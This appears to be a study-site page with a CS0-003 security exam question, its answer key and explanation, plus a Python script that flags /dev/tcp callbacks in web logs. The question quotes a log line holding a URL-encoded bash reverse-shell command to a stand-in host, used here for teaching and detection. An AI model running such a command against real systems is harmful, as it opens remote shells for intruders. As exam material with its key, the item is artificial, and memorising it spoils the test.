CS0-003 Question #615: Real Exam Question with Answer & Explanation
The correct answer is B: This is a successful lateral movement abusing an RCE vulnerability.
Question
A security analyst identifies the following log entry in the web server logs:

10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+- i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%261 http/1.1" 200 -

Which of the following best explains the log entry?
Options
- A. This was caused by an administrator logging in to a website using the command line.
- B. This is a successful lateral movement abusing an RCE vulnerability.
- C. This is a failed attack attempting to exploit an LFI vulnerability.
- D. This was caused by a successful RFI vulnerability exploitation.
Explanation
The URL parameter (cmd=bash -i >& /dev/tcp/10.20.10.22/1234 0>&1) is classic remote‑code‑execution syntax for spawning a reverse shell back to the attacker’s host. The 200 status shows the command ran successfully, indicating the attacker has gained shell access (a form of lateral movement) via an RCE flaw.
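The decoding step in the explanation can be scripted for log triage. The following is an added example, not part of the original question or its answer key: it URL-decodes each query parameter and flags values that redirect to `/dev/tcp/<host>/<port>`. The sample lines are constructed (the first is modelled on the entry in the question), and the function and pattern names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in the same layout as the entry in the question.
SAMPLE_LOG = [
    '10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+-i+>%26+'
    '/dev/tcp/10.20.10.22/1234+0%3E%261 http/1.1" 200 -',
    '10.203.10.40 - - [22/May/2024 11:07:02] "GET /index.html http/1.1" 200 -',
    '10.203.10.41 - - [22/May/2024 11:08:15] "GET /search?q=tcp+port+1234 http/1.1" 200 -',
]

# client, ident, user, [timestamp], "METHOD target PROTO", status
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.+) (?P<proto>\S+)" (?P<status>\d{3})\b'
)
# Shell redirection to a network pseudo-device, as seen in the decoded cmd value.
CALLBACK_RE = re.compile(r'/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d+)')


def find_callback_commands(lines):
    """Return one finding per query parameter whose decoded value opens /dev/tcp."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected access-log layout
        query = urlsplit(m['target']).query
        # parse_qsl turns '+' into spaces and resolves %XX escapes (%26 -> &, %3E -> >).
        for name, value in parse_qsl(query, keep_blank_values=True):
            hit = CALLBACK_RE.search(value)
            if hit:
                findings.append({
                    'client': m['client'],
                    'timestamp': m['ts'],
                    'param': name,
                    'decoded': value,
                    'callback_host': hit['host'],
                    'callback_port': int(hit['port']),
                    'status': int(m['status']),
                })
    return findings


if __name__ == '__main__':
    for finding in find_callback_commands(SAMPLE_LOG):
        print(finding)
```

Each finding gives the host and port to check against the web server's outbound connection records.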